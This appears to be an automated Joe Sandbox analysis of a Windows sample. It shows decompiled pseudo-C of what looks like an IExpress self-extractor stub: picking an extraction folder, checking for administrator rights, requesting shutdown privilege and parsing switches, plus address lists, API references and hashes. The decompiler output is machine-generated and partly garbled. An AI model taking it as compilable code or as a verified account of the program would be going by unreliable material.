				if (_t69 == 0) goto 0x4c513618;
				if (__r8 - __rbx - __rbx != 0x834) goto 0x4c5137fd;
				r9d = 0x200;
				if (LoadStringA(??, ??, ??, ??) != 0) goto 0x4c5135de;
				_v16 = _v16 & 0x00000000;
				r9d = 0;
				r8d = 0;
				_v24 = r15d;
				E00007FF67FF64C514DCC(__rcx, 0x4c51c850, __r9, _t136);
				goto 0x4c51374b;
				if (E00007FF67FF64C514A60(_t89, __rbx, __rcx, _t119, __rbp) == 0) goto 0x4c5137fd;
				if (SetDlgItemTextA(??, ??, ??) != 0) goto 0x4c5137fd;
				goto 0x4c5135c2;
				EndDialog(??, ??);
				 *0x4c51d544 = 0x800704c7;
				goto 0x4c5137fd;
				r9d = 0x104;
				if (GetDlgItemTextA(??, ??, ??, ??) == 0) goto 0x4c51375f;
				_t91 = (_t89 | 0xffffffff) + 1;
				if ( *((char*)(_t91 + 0x4c51d610)) != 0) goto 0x4c513662;
				if (_t91 - 3 < 0) goto 0x4c51375f;
				_t29 =  *0x4c51d611; // 0x3a
				if (_t29 == 0x3a) goto 0x4c513694;
				if ( *0x4c51d610 != 0x5c) goto 0x4c51375f;
				if (_t29 != 0x5c) goto 0x4c51375f;
				if (GetFileAttributesA(??) != 0xffffffff) goto 0x4c5136fa;
				_v16 = 4;
				r9d = 0;
				_v24 = 0x20;
				if (E00007FF67FF64C514DCC(_t117, 0x4c51d610, __r9, _t136) != 6) goto 0x4c5137fd;
				_t32 = CreateDirectoryA(??, ??);
				if (_t32 != 0) goto 0x4c5136fa;
				_v16 = _v16 & _t32;
				r9d = 0;
				goto 0x4c51376f;
				E00007FF67FF64C517BA8(0x104, _t91, _t93, 0x4c51d610, _t119, 0x4c51d610, 0x4c519700);
				if (E00007FF67FF64C516B70(_t46, _t91, _t93, 0x4c51d610, _t119, 0x4c51d610) != 0) goto 0x4c513721;
				goto 0x4c513764;
				if ( *0x4c51d610 != 0x5c) goto 0x4c513733;
				if ( *0x4c51d611 == 0x5c) goto 0x4c513748;
				r8d = _t46;
				if (E00007FF67FF64C516CA4(_t46, _t93, 0x4c51d610, _t117, _t119, 0x4c519700, __r9, _t136) == 0) goto 0x4c5137fd;
				EndDialog(??, ??);
				goto 0x4c5137fd;
				_v16 = _v16 & 0x00000000;
				r9d = 0;
				r8d = 0;
				_v24 = r15d;
				E00007FF67FF64C514DCC(_t117, 0x4c519700, _t135, _t136);
				goto 0x4c5137fd;
				GetDesktopWindow();
				E00007FF67FF64C514C68(E00007FF67FF64C516CA4(_t46, _t93, 0x4c51d610, _t117, _t119, 0x4c519700, __r9, _t136), _t93, _t117, _t91, 0x4c519700, _t135);
				SetWindowTextA(??, ??);
				_v24 = _v24 & 0x00000000;
				r9d = 0x103;
				r8d = _t135 - 0x3e;
				SendDlgItemMessageA(??, ??, ??, ??, ??);
				_t87 =  *0x4c51de78 - _t46; // 0x3
				if (_t87 != 0) goto 0x4c5137fd;
				GetDlgItem(??, ??);
				EnableWindow(??, ??);
				goto 0x4c513815;
				EndDialog(??, ??);
				return 1;
			}

0x7ff64c513530
0x7ff64c513530
0x7ff64c513530
0x7ff64c513530
0x7ff64c513535
0x7ff64c51353a
0x7ff64c513545
0x7ff64c51354b
0x7ff64c513551
0x7ff64c513557
0x7ff64c513561
0x7ff64c513567
0x7ff64c513569
0x7ff64c51356d
0x7ff64c513575
0x7ff64c51357e
0x7ff64c51358b
0x7ff64c51359f
0x7ff64c5135bb
0x7ff64c5135c2
0x7ff64c5135c7
0x7ff64c5135ca
0x7ff64c5135cd
0x7ff64c5135d2
0x7ff64c5135d9
0x7ff64c5135e5
0x7ff64c513608
0x7ff64c513616
0x7ff64c51361a
0x7ff64c513626
0x7ff64c513630
0x7ff64c51363c
0x7ff64c513658
0x7ff64c513662
0x7ff64c513669
0x7ff64c51366f
0x7ff64c513675
0x7ff64c51367d
0x7ff64c513686
0x7ff64c51368e
0x7ff64c5136a6
0x7ff64c5136a8
0x7ff64c5136b0
0x7ff64c5136b6
0x7ff64c5136ce
0x7ff64c5136d9
0x7ff64c5136e7
0x7ff64c5136e9
0x7ff64c5136f0
0x7ff64c5136f8
0x7ff64c513709
0x7ff64c513718
0x7ff64c51371f
0x7ff64c513728
0x7ff64c513731
0x7ff64c513733
0x7ff64c513742
0x7ff64c51374e
0x7ff64c51375a
0x7ff64c513764
0x7ff64c513769
0x7ff64c51376c
0x7ff64c513772
0x7ff64c513777
0x7ff64c51377c
0x7ff64c51377e
0x7ff64c513790
0x7ff64c51379f
0x7ff64c5137ab
0x7ff64c5137b1
0x7ff64c5137bf
0x7ff64c5137c3
0x7ff64c5137cf
0x7ff64c5137d6
0x7ff64c5137e0
0x7ff64c5137f1
0x7ff64c513800
0x7ff64c513804
0x7ff64c51382a

APIs

LoadStringA.USER32 ref: 00007FF64C5135AA
EndDialog.USER32 ref: 00007FF64C51374E
GetDesktopWindow.USER32 ref: 00007FF64C51377E
SetWindowTextA.USER32 ref: 00007FF64C51379F
SendDlgItemMessageA.USER32 ref: 00007FF64C5137C3
GetDlgItem.USER32 ref: 00007FF64C5137E0
EnableWindow.USER32 ref: 00007FF64C5137F1
EndDialog.USER32 ref: 00007FF64C513804

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF64C513635
, xrefs: 00007FF64C5136B6
Maintal, xrefs: 00007FF64C513795

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Maintal
API String ID: 3530494346-2610190985
Opcode ID: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
Instruction ID: 6a520a05aa0220bed337196c01bbbce8d709ef133ada8187171f957825c28b74
Opcode Fuzzy Hash: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
Instruction Fuzzy Hash: B4719561E0C6428AF768BF29A41C37D6E91FF85B94F548132CABE82795CF3CE5258700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5112EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF64C5111CC: LoadLibraryA.KERNEL32 ref: 00007FF64C511209
Part of subcall function 00007FF64C5111CC: GetProcAddress.KERNEL32 ref: 00007FF64C51122B
Part of subcall function 00007FF64C5111CC: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF64C511278
Part of subcall function 00007FF64C5111CC: FreeSid.ADVAPI32 ref: 00007FF64C5112A0
Part of subcall function 00007FF64C5111CC: FreeLibrary.KERNEL32 ref: 00007FF64C5112AF

GetCurrentProcess.KERNEL32 ref: 00007FF64C51134D
OpenProcessToken.ADVAPI32 ref: 00007FF64C511363
GetTokenInformation.ADVAPI32 ref: 00007FF64C51138C
GetLastError.KERNEL32 ref: 00007FF64C5113A0
LocalAlloc.KERNEL32 ref: 00007FF64C5113BA
GetTokenInformation.ADVAPI32 ref: 00007FF64C5113E8
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF64C511435
EqualSid.ADVAPI32 ref: 00007FF64C511460
FreeSid.ADVAPI32 ref: 00007FF64C511485
LocalFree.KERNEL32 ref: 00007FF64C511494
CloseHandle.KERNEL32 ref: 00007FF64C5114A4

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
Instruction ID: 7e51fdeea804583b1d98d92475d66fb0dbbe30404c0c987ae06a40ce89841c3e
Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
Instruction Fuzzy Hash: B1517136A08A41CAE724BF25E4482BD7FA4FB4DB98F415176DA1E93758CF38E464C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C511C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF64C512D7F), ref: 00007FF64C511C21
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF64C512D7F), ref: 00007FF64C511C3A
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF64C511C7B
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF64C511CB2
CloseHandle.KERNEL32 ref: 00007FF64C511CC5
ExitWindowsEx.USER32 ref: 00007FF64C511CF1

Strings

SeShutdownPrivilege, xrefs: 00007FF64C511C74

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 2829607268-3733053543
Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
Instruction ID: 4ddff4fb06040b76ac9161da9763e691d47dfe00b7532065336a7a26b2f972b2
Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
Instruction Fuzzy Hash: 92216B76E2CA4286E754BF28E05977EBF60FB89749F409136DA5E82B58DF3CD0548B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C518964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF64C518994
GetCurrentProcessId.KERNEL32 ref: 00007FF64C5189A2
GetCurrentThreadId.KERNEL32 ref: 00007FF64C5189AE
GetTickCount.KERNEL32 ref: 00007FF64C5189BA
GetTickCount.KERNEL32 ref: 00007FF64C5189CA
QueryPerformanceCounter.KERNEL32 ref: 00007FF64C5189E5

Memory Dump Source

Source File: 00000000.00000002.510046569.00007FF64C511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64C510000, based on PE: true

Associated: 00000000.00000002.510037191.00007FF64C510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510058354.00007FF64C519000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510068081.00007FF64C51C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C51E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64c510000_Informazion.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
Instruction ID: 9bd60db778dbee5f41e7ef45c0f27b8e30a263a9898604a5b06b819739ba9d65
Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
Instruction Fuzzy Hash: 33112122A08B418AEB14FF65E8482AC37A4FB09758F400A35EA6D87754EF7CE574C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64C5170A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00007FF67FF64C5170A8(void* __ebx, long long __rbx, intOrPtr* __rcx, long long __rdi, long long __rsi, void* __r11) {
				void* __rbp;
				void* _t68;
				char _t70;
				CHAR* _t75;
				intOrPtr _t76;
				CHAR* _t77;
				intOrPtr _t80;
				CHAR* _t81;
				intOrPtr _t82;
				CHAR* _t83;
				CHAR* _t89;
				char _t93;
				char _t96;
				intOrPtr _t98;
				intOrPtr _t100;
				char _t112;
				void* _t118;
				signed int _t130;
				signed int _t141;
				void* _t170;
				void* _t171;
				signed int _t174;
				char _t206;
				char _t208;
				char _t225;
				signed long long _t229;
				signed long long _t230;
				long _t232;
				signed long long _t236;
				void* _t238;
				char* _t240;
				signed long long _t244;
				void* _t246;
				signed long long _t247;
				void* _t249;
				CHAR* _t266;
				CHAR* _t267;
				CHAR* _t268;
				void* _t279;
				intOrPtr _t289;
				CHAR* _t305;
				void* _t308;
				signed long long _t309;
				CHAR* _t312;
				void* _t322;
				long _t325;
				CHAR* _t327;
				struct HINSTANCE__* _t329;
				signed long long _t331;
				intOrPtr* _t332;
				CHAR* _t334;

				_t303 = __rsi;
				_t118 = __ebx;
				 *((long long*)(_t308 + 0x10)) = __rbx;
				 *((long long*)(_t308 + 0x18)) = __rsi;
				 *((long long*)(_t308 + 0x20)) = __rdi;
				_t306 = _t308 - 0x60;
				_t309 = _t308 - 0x160;
				_t229 =  *0x4c51c008; // 0xdeba5460e397
				_t230 = _t229 ^ _t309;
				 *(_t308 - 0x60 + 0x50) = _t230;
				r15d = 0;
				r12d = 1;
				if (__rcx == 0) goto 0x4c5176c0;
				if ( *__rcx == r15b) goto 0x4c5176c0;
				_t141 = _t325 + 1;
				r13d = 0x104;
				if (r12d == 0) goto 0x4c5171cd;
				if ( *((char*)(__rcx)) == 0x20) goto 0x4c51711d;
				if ( *__rcx - 9 - 4 > 0) goto 0x4c517131;
				CharNextA(_t334);
				_t331 = _t230;
				goto 0x4c51710e;
				if ( *_t331 == r15b) goto 0x4c5171cd;
				_t266 = _t334;
				r8d = r15d;
				r9d = r15d;
				_t130 = r12d;
				if (r8d != 0) goto 0x4c51715a;
				_t68 =  *_t331;
				if (_t68 == 0x20) goto 0x4c5171b2;
				if (_t68 - 9 - 4 <= 0) goto 0x4c5171b2;
				goto 0x4c51715f;
				if (r9d != 0) goto 0x4c5171b2;
				_t70 =  *_t331;
				if (_t70 != 0x22) goto 0x4c517194;
				if ( *((intOrPtr*)(_t331 + 1)) == _t70) goto 0x4c51717b;
				if (r8d != 0) goto 0x4c517176;
				r8d = r12d;
				goto 0x4c5171a7;
				r9d = r12d;
				goto 0x4c5171a7;
				if (_t130 - r13d >= 0) goto 0x4c517566;
				( &(_t266[0x40]))[_t309] = 0x22;
				_t267 =  &(_t266[_t325]);
				goto 0x4c5171aa;
				if (_t130 + r12d - r13d >= 0) goto 0x4c517566;
				( &(_t267[0x40]))[_t309] = _t70;
				_t268 =  &(_t267[_t325]);
				_t232 = _t325;
				_t332 = _t331 + _t232;
				if ( *_t332 != r15b) goto 0x4c517146;
				if (_t268 - _t327 >= 0) goto 0x4c5176f1;
				( &(_t268[0x40]))[_t309] = r15b;
				if (r8d == 0) goto 0x4c517225;
				if (r9d != 0) goto 0x4c51722a;
				_t170 =  *0x4c51cd0c - r15d; // 0x0
				if (_t170 == 0) goto 0x4c5176bc;
				_t171 =  *0x4c51ce1e - r15b; // 0x0
				if (_t171 != 0) goto 0x4c5176bc;
				r8d = r13d;
				if (GetModuleFileNameA(_t329, _t327, _t325) == 0) goto 0x4c5176b9;
				E00007FF67FF64C517D68(0x5c, _t232, 0x4c51ce1e, 0x4c51ce1e, __rsi, _t308 - 0x60);
				 *(_t232 + 1) = r15b;
				goto 0x4c5176bc;
				if (r9d != 0) goto 0x4c5171ca;
				_t174 =  *((intOrPtr*)(_t309 + 0x40)) - 0x0000002d & 0x000000fd;
				if (_t174 != 0) goto 0x4c517566;
				_t75 = CharUpperA(_t305);
				if (_t174 == 0) goto 0x4c51766f;
				if (_t174 == 0) goto 0x4c51756d;
				if (_t174 == 0) goto 0x4c517443;
				if (_t174 == 0) goto 0x4c5173cd;
				if (_t174 == 0) goto 0x4c517381;
				if (_t174 == 0) goto 0x4c517298;
				if (_t75 - 0x3b - r12d - 7 - r12d == _t141) goto 0x4c517443;
				if ( *_t332 == r15b) goto 0x4c5171cd;
				goto 0x4c517106;
				_t76 =  *((intOrPtr*)(_t309 + 0x42));
				if (_t76 != 0) goto 0x4c5172b3;
				 *0x4c51de5c = 3;
				 *0x4c51cd08 = r12d;
				goto 0x4c51728a;
				if (_t76 != 0x3a) goto 0x4c517346;
				 *0x4c51de5c = r12d;
				if (_t76 == 0) goto 0x4c51728a;
				_t21 = _t309 + 0x43; // 0x44
				_t77 = CharUpperA(??);
				if (_t77 == 0x41) goto 0x4c51732e;
				if (_t77 == 0x44) goto 0x4c517325;
				if (_t77 == 0x49) goto 0x4c51731c;
				if (_t77 == 0x4e) goto 0x4c517313;
				if (_t77 == 0x50) goto 0x4c517309;
				if (_t77 == 0x53) goto 0x4c517300;
				goto 0x4c51733b;
				 *0x4c51de5c =  *0x4c51de5c | 0x00000004;
				goto 0x4c517334;
				asm("bts dword [0x5d17], 0x7");
				goto 0x4c51733b;
				 *0x4c51de5c =  *0x4c51de5c & 0xfffffffe;
				goto 0x4c517334;
				 *0x4c51de5c =  *0x4c51de5c & 0xfffffffd;
				goto 0x4c517334;
				 *0x4c51d028 =  *0x4c51d028 | 0x00000040;
				goto 0x4c51733b;
				 *0x4c51de5c =  *0x4c51de5c | _t141;
				 *0x4c51cd08 = r12d;
				if ( *((intOrPtr*)(_t21 + _t325)) != 0) goto 0x4c5172d0;
				goto 0x4c51728a;
				 *(_t309 + 0x28) =  *(_t309 + 0x28) | 0xffffffff;
				_t24 = _t309 + 0x41; // 0x42
				r9d = r9d | 0xffffffff;
				 *((long long*)(_t309 + 0x20)) = _t24;
				if (CompareStringA(??, ??, ??, ??, ??, ??) == _t141) goto 0x4c51728a;
				goto 0x4c517287;
				_t80 =  *((intOrPtr*)(_t309 + 0x42));
				if (_t80 != 0) goto 0x4c517395;
				 *0x4c51cd18 = _t141;
				goto 0x4c51728a;
				if (_t80 != 0x3a) goto 0x4c517287;
				_t81 = CharUpperA(??);
				if (_t81 == 0x31) goto 0x4c517389;
				if (_t81 == 0x41) goto 0x4c5173c0;
				if (_t81 == 0x55) goto 0x4c517389;
				goto 0x4c517287;
				 *0x4c51cd18 = r12w;
				goto 0x4c51728a;
				_t82 =  *((intOrPtr*)(_t309 + 0x42));
				if (_t82 != 0) goto 0x4c5173e1;
				 *0x4c51cd0c = r12d;
				goto 0x4c51728a;
				if (_t82 != 0x3a) goto 0x4c517287;
				if (_t82 == 0) goto 0x4c51728a;
				_t30 = _t309 + 0x43; // 0x44
				_t83 = CharUpperA(??);
				if (_t83 == 0x45) goto 0x4c517431;
				if (_t83 == 0x47) goto 0x4c517428;
				if (_t83 == 0x56) goto 0x4c51741f;
				goto 0x4c517438;
				 *0x4c51cd14 = r12d;
				goto 0x4c517438;
				 *0x4c51cd10 = r12d;
				goto 0x4c517438;
				 *0x4c51cd0c = r12d;
				if ( *((intOrPtr*)(_t30 + _t325)) != 0) goto 0x4c5173fb;
				goto 0x4c51728a;
				if ( *((char*)(_t309 + 0x42)) != 0x3a) goto 0x4c517287;
				_t236 =  *((intOrPtr*)(_t309 + 0x43));
				_t33 = _t309 + 0x40; // 0x41
				asm("sbb ebx, ebx");
				_t238 = (_t236 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t33 + _t236 + _t238)) != r15b) goto 0x4c51746a;
				if (_t238 == 0) goto 0x4c517287;
				_t35 = _t309 + 0x30; // 0x31
				 *((intOrPtr*)(_t309 + 0x30)) = _t118 + 4;
				if (E00007FF67FF64C517024(_t33 + _t236, _t35) == 0) goto 0x4c517287;
				_t89 = CharUpperA(??);
				_t312 = _t327;
				_t38 = _t309 + 0x40; // 0x41
				if (_t89 != 0x54) goto 0x4c5174e7;
				_t279 = _t38 + _t238 - 0x4c51ce1e;
				_t240 =  &(_t312[0x7ffffefa]);
				if (_t240 == 0) goto 0x4c517518;
				_t93 =  *((intOrPtr*)(_t279 + 0x4c51ce1e));
				_t206 = _t93;
				if (_t206 == 0) goto 0x4c517518;
				 *0x4c51ce1e = _t93;
				if (_t206 != 0) goto 0x4c5174c8;
				goto 0x4c517518;
				if (_t312 - _t325 + 0x7ffffefa == 0) goto 0x4c517518;
				_t96 =  *((intOrPtr*)(_t279 + _t240 - 0x4c51cd1a + 0x4c51cd1a));
				_t208 = _t96;
				if (_t208 == 0) goto 0x4c517518;
				 *0x4c51cd1a = _t96;
				_t297 = 0x4c51cd1a + _t325;
				if (_t208 != 0) goto 0x4c5174fb;
				_t44 = _t297 - 1; // -1
				_t244 =  !=  ? 0x4c51cd1a + _t325 : _t44;
				 *_t244 = r15b;
				E00007FF67FF64C517BA8(r13d, _t244, 0x4c51cd1a, 0x4c51cd1a, _t303, _t308 - 0x60, 0x4c519700);
				_t246 = (_t244 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(0x4c51cd1a + _t246)) != r15b) goto 0x4c51753f;
				if (_t246 - 3 < 0) goto 0x4c517566;
				_t98 =  *0x7FF64C51CD1B;
				if (_t98 == 0x3a) goto 0x4c51728a;
				if ( *0x4c51cd1a != 0x5c) goto 0x4c517566;
				if (_t98 == 0x5c) goto 0x4c51728a;
				goto 0x4c5176c3;
				_t100 =  *((intOrPtr*)(_t309 + 0x42));
				if (_t100 != 0) goto 0x4c517581;
				 *0x4c51cd04 = r12d;
				goto 0x4c51728a;
				if (_t100 != 0x3a) goto 0x4c517287;
				_t247 =  *((intOrPtr*)(_t309 + 0x43));
				_t49 = _t309 + 0x40; // 0x41
				asm("sbb edi, edi");
				_t262 = _t49 + _t247;
				_t249 = (_t247 | 0xffffffff) + 1;
				if ( *((intOrPtr*)(_t49 + _t247 + _t249)) != r15b) goto 0x4c5175a5;
				if (_t249 != 0) goto 0x4c5175bd;
				goto 0x4c517287;
				E00007FF67FF64C517CE8(0x5b, _t249, _t49 + _t247, _t49 + _t247, _t303);
				if (_t249 == 0) goto 0x4c5175e1;
				E00007FF67FF64C517CE8(0x5d, _t249, _t49 + _t247, _t262, _t303);
				if (_t249 == 0) goto 0x4c5175b3;
				E00007FF67FF64C517CE8(0x5d, _t249, _t262, _t262, _t303);
				if (_t249 == 0) goto 0x4c517605;
				E00007FF67FF64C517CE8(0x5b, _t249, _t262, _t262, _t303);
				if (_t249 == 0) goto 0x4c5175b3;
				_t51 = _t309 + 0x30; // 0x31
				 *((intOrPtr*)(_t309 + 0x30)) = 2;
				if (E00007FF67FF64C517024(_t262, _t51) == 0) goto 0x4c5175b3;
				_t54 = _t309 + 0x40; // 0x41
				if ( &(_t327[0x7ffffefa]) == 0) goto 0x4c517657;
				_t112 =  *((intOrPtr*)(_t54 + _t249 - 0x4c51cf22 + 0x4c51cf22));
				_t225 = _t112;
				if (_t225 == 0) goto 0x4c517657;
				 *0x4c51cf22 = _t112;
				_t300 = 0x4c51cf22 + _t325;
				if (_t225 != 0) goto 0x4c51763a;
				_t57 = _t300 - 1; // -1
				_t253 =  !=  ? 0x4c51cf22 + _t325 : _t57;
				 *( !=  ? 0x4c51cf22 + _t325 : _t57) = r15b;
				goto 0x4c51728a;
				 *(_t309 + 0x28) = r15d;
				r9d = 0;
				 *((intOrPtr*)(_t309 + 0x20)) = 0x40;
				E00007FF67FF64C514DCC(_t54 + _t249 - 0x4c51cf22, 0x4c519700, 0x4c51cf22, _t322);
				_t289 =  *0x4c51c830; // 0x0
				if (_t289 == 0) goto 0x4c5176aa;
				CloseHandle(??);
				ExitProcess(??);
				asm("int3");
				goto 0x4c5176c3;
				return E00007FF67FF64C518470(r12d, 0,  *(_t306 + 0x50) ^ _t309);
			}

0x7ff64c5170a8
0x7ff64c5170a8
0x7ff64c5170a8
0x7ff64c5170ad
0x7ff64c5170b2
0x7ff64c5170c0
0x7ff64c5170c5
0x7ff64c5170cc
0x7ff64c5170d3
0x7ff64c5170d6
0x7ff64c5170da
0x7ff64c5170dd
0x7ff64c5170ec
0x7ff64c5170f5
0x7ff64c5170fb
0x7ff64c517100
0x7ff64c517108
0x7ff64c517112
0x7ff64c51711b
0x7ff64c517120
0x7ff64c51712c
0x7ff64c51712f
0x7ff64c517134
0x7ff64c51713a
0x7ff64c51713d
0x7ff64c517140
0x7ff64c517143
0x7ff64c517149
0x7ff64c51714b
0x7ff64c517150
0x7ff64c517156
0x7ff64c517158
0x7ff64c51715d
0x7ff64c51715f
0x7ff64c517164
0x7ff64c51716a
0x7ff64c51716f
0x7ff64c517171
0x7ff64c517174
0x7ff64c517176
0x7ff64c517179
0x7ff64c51717e
0x7ff64c517187
0x7ff64c51718c
0x7ff64c517192
0x7ff64c517197
0x7ff64c5171a0
0x7ff64c5171a4
0x7ff64c5171a7
0x7ff64c5171aa
0x7ff64c5171b0
0x7ff64c5171b5
0x7ff64c5171bb
0x7ff64c5171c3
0x7ff64c5171c8
0x7ff64c5171cd
0x7ff64c5171d4
0x7ff64c5171da
0x7ff64c5171e1
0x7ff64c5171f8
0x7ff64c517209
0x7ff64c517217
0x7ff64c51721c
0x7ff64c517220
0x7ff64c517228
0x7ff64c517230
0x7ff64c517232
0x7ff64c51723e
0x7ff64c517250
0x7ff64c517259
0x7ff64c517262
0x7ff64c51726b
0x7ff64c517274
0x7ff64c51727d
0x7ff64c517281
0x7ff64c51728d
0x7ff64c517293
0x7ff64c517298
0x7ff64c51729e
0x7ff64c5172a0
0x7ff64c5172aa
0x7ff64c5172b1
0x7ff64c5172b5
0x7ff64c5172c0
0x7ff64c5172c9
0x7ff64c5172cb
0x7ff64c5172d4
0x7ff64c5172e5
0x7ff64c5172e9
0x7ff64c5172ed
0x7ff64c5172f1
0x7ff64c5172f5
0x7ff64c5172f9
0x7ff64c5172fe
0x7ff64c517300
0x7ff64c517307
0x7ff64c517309
0x7ff64c517311
0x7ff64c517313
0x7ff64c51731a
0x7ff64c51731c
0x7ff64c517323
0x7ff64c517325
0x7ff64c51732c
0x7ff64c51732e
0x7ff64c517334
0x7ff64c51733f
0x7ff64c517341
0x7ff64c517346
0x7ff64c51734b
0x7ff64c517350
0x7ff64c517354
0x7ff64c517376
0x7ff64c51737c
0x7ff64c517381
0x7ff64c517387
0x7ff64c517389
0x7ff64c517390
0x7ff64c517397
0x7ff64c5173a3
0x7ff64c5173b1
0x7ff64c5173b5
0x7ff64c5173b9
0x7ff64c5173bb
0x7ff64c5173c0
0x7ff64c5173c8
0x7ff64c5173cd
0x7ff64c5173d3
0x7ff64c5173d5
0x7ff64c5173dc
0x7ff64c5173e3
0x7ff64c5173f0
0x7ff64c5173f6
0x7ff64c5173ff
0x7ff64c517410
0x7ff64c517414
0x7ff64c517418
0x7ff64c51741d
0x7ff64c51741f
0x7ff64c517426
0x7ff64c517428
0x7ff64c51742f
0x7ff64c517431
0x7ff64c51743c
0x7ff64c51743e
0x7ff64c517448
0x7ff64c51744e
0x7ff64c517453
0x7ff64c51745c
0x7ff64c51746a
0x7ff64c517471
0x7ff64c517476
0x7ff64c51747c
0x7ff64c517481
0x7ff64c51748c
0x7ff64c517498
0x7ff64c5174a4
0x7ff64c5174a7
0x7ff64c5174b2
0x7ff64c5174c5
0x7ff64c5174c8
0x7ff64c5174d2
0x7ff64c5174d4
0x7ff64c5174d7
0x7ff64c5174d9
0x7ff64c5174db
0x7ff64c5174e3
0x7ff64c5174e5
0x7ff64c517505
0x7ff64c517507
0x7ff64c51750a
0x7ff64c51750c
0x7ff64c51750e
0x7ff64c517510
0x7ff64c517516
0x7ff64c51751b
0x7ff64c517529
0x7ff64c517533
0x7ff64c517536
0x7ff64c51753f
0x7ff64c517546
0x7ff64c51754c
0x7ff64c51754e
0x7ff64c517553
0x7ff64c51755c
0x7ff64c517560
0x7ff64c517568
0x7ff64c51756d
0x7ff64c517573
0x7ff64c517575
0x7ff64c51757c
0x7ff64c517583
0x7ff64c517589
0x7ff64c51758e
0x7ff64c517597
0x7ff64c51759e
0x7ff64c5175a5
